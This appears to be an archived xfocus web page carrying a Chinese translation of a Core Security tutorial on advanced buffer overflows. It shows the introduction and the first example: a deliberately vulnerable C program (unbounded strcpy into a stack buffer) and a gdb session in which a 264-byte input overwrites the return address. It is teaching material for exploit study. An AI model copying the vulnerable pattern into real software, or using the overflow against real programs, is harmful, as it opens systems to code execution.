📄 467.html
字号:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>非安全编程演示之高级缓存区溢出(version1.2) </title><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><meta name="Keywords" content="安全焦点, xfocus, 陷阱网络, honeynet, honeypot, 调查取证, forensic, 入侵检测, intrusion detection, 无线安全, wireless security, 安全论坛, security forums, 安全工具, security tools, 攻击程序, exploits, 安全公告, security advisories, 安全漏洞, security vulnerabilities, 安全教程, security tutorials, 安全培训, security training, 安全帮助, security help, 安全标准, security standards, 安全代码, security code, 安全资源, security resources, 安全编程, security programming, 加密, cryptography," /><link rel="stylesheet" href="../../css/plone.css" type="text/css"></head><body bgcolor="#FFFFFF" text="#000000"><div class="top"> <div class="searchBox"> <form name="searchform" action="http://www.google.com/search" method="get"> <input type="hidden" name="domains" value="www.xfocus.net"> <input type="hidden" name="sitesearch" value="www.xfocus.net"> <input type="text" name="q" size="20"> <input type="submit" name="btnG" value="Google Search"> </form> </div> <img src="../../images/logo.gif" border="0" width="180" height="80" alt="xfocus logo"> <img src="../../images/title.gif" border="0" width="230" height="20" alt="xfocus title"></div><div class="tabs"> <a href="../../index.html" class="plain">首页</a> <a href="../../releases/index.html" class="plain">焦点原创</a> <a href="../../articles/index.html" class="selected">安全文摘</a> <a href="../../tools/index.html" class="plain">安全工具</a> <a href="../../vuls/index.html" class="plain">安全漏洞</a> <a href="../../projects/index.html" class="plain">焦点项目</a> <a href="https://www.xfocus.net/bbs/index.php?lang=cn" class="plain">焦点论坛</a> <a href="../../about/index.html" class="plain">关于我们</a></div><div class="personalBar"> <a href='https://www.xfocus.net/php/add_article.php'>添加文章</a> <a href='http://www.xfocus.org/'>English Version</a></div><table class="columns"> <tr> <td class="left"><div class="box"> <h5> 文章分类 </h5> <div class="body"> <div class="content odd"> <div style="white-space: nowrap;"> <img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/4.html'>专题文章</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/2.html'>漏洞分析</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/3.html'>安全配置</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/1.html'>黑客教学</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/5.html'><b>编程技术 <<</b></a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/7.html'>工具介绍</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/6.html'>火墙技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/8.html'>入侵检测</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/9.html'>破解专题</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/11.html'>焦点公告</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/12.html'>焦点峰会</a><br> </div> </div> </div></div><div class="box"> <h5> 文章推荐 </h5> <div class="body"> <div class="content odd"> <img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200307/579.html'>LSD RPC 溢出漏洞之分析</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200306/562.html'>任意用户模式下执行 ring 0 代码</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200307/563.html'>IIS的NSIISLOG.DLL溢出问题分析</a><br> </div> </div></div> </td> <td class="main"> <h1>非安全编程演示之高级缓存区溢出(version1.2)</h1><br>创建时间:2002-12-19<br>文章属性:翻译<br>文章来源:<a href='http://packetstormsecurity.nl/papers/general/core_vulnerabilities.pdf' target='_blank'>http://packetstormsecurity.nl/papers/general/core_vulnerabilities.pdf</a><br>文章提交:<a href='https://www.xfocus.net/bbs/index.php?lang=cn&act=Profile&do=03&MID=24419'>Ph4nt0m</a> (axis_at_ph4nt0m.net)<br><br>题目:非安全编程演示之高级缓存区溢出<br />
版本:1.2<br />
更新:2002.12.13<br />
版权所有:<a href='http://www.code-sec.com' target='_blank'>http://www.code-sec.com</a><br />
翻译+整理 By 刺(ph4nt0m),cloie<br />
来源:幻影旅团翻译组<a href='http://www.3389.net/bbs' target='_blank'>http://www.3389.net/bbs</a><br />
<br />
译者注:本文是alert7所翻译的《非安全编程演示之高级篇》的更新版本,加入了作者的很多分析。原作者为coresecurity team。我们尽可能翻译出作者的原意,不足或错误之处还请高手指点。在翻译过程中,感谢水木的hellguard,绿盟的warning3,以及好友d0nNy等的指导。<br />
<br />
目录<br />
<br />
简介<br />
高级缓存区溢出代码1的分析<br />
高级缓存区溢出代码2的分析<br />
高级缓存区溢出代码3的分析<br />
高级缓存区溢出代码4的分析<br />
高级缓存区溢出代码5的分析<br />
高级缓存区溢出代码6的分析<br />
高级缓存区溢出代码7的分析<br />
高级缓存区溢出代码8的分析<br />
高级缓存区溢出代码9的分析<br />
高级缓存区溢出代码10的分析<br />
<br />
<br />
简介<br />
CoreSecurity将在本文中,分析程序员在使用C编程过程中一些比较常见的错误。要讨论的就是高级缓存溢出(ABO),以十个具体例子说明(作者gera)。我们将指出这些程序中薄弱点的细节,为什么这些错误是危险的,并提供相应的exploit。所有测试均是在Linux Slackware 8.0 server(IA32),GNU GCC 2.95.3环境下。<br />
我们假设读者都是精通C语言编程的,并知道基本的堆、栈溢出原理,GOT等。在本文中,我们将不提供关于任何关于这些的信息,如果不了解,请阅读本文最后相关的参考。<br />
可以从<a href='http://www.core-sec.com' target='_blank'>www.core-sec.com</a>得到本文的升级,任何疑问请与我们联系:info@core-sec.com<br />
<br />
<br />
高级缓存区溢出代码1的分析<br />
源代码:<br />
/*abo1.c *<br />
* specially crafted to feed your brain by gera@core-sdi.com */<br />
/* Dumb example to let you get introduced… */ <br />
<br />
int main(int argv,char **argc)<br />
{ <br />
char buf[256];<br />
strcpy(buf,argc[1]);<br />
}<br />
<br />
这是一个非常经典的堆栈溢出,我们将使用debugging来分析它。<br />
user@CoreLabs:~/gera$ gcc abo1.c –o abo1 -ggdb<br />
user@CoreLabs:~/gera$ gdb ./abo1<br />
GNU gdb 5.0<br />
……….<br />
This GDB was configured as “i386-slackware-linux”…<br />
(gdb) r `perl –e ‘printf “A” x 264’`<br />
Starting program: /home/user/gera/abo1 `perl –e ‘printf “A” x 264’`<br />
Program received signal SIGSEGV,Segmentation fault.<br />
0x41414141 in ?? ()<br />
(gdb) i r<br />
eax 0xbffff7ec - 1073743892<br />
ecx 0xfffffd7c - 644<br />
edx 0xbffffb78 - 1073742984<br />
ebx 0x4012ba58 1074969176<br />
esp 0xbffff8f4 0xbffff8f4<br />
ebp 0x41414141 0x41414141<br />
esi 0x40015d64 1073831268<br />
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -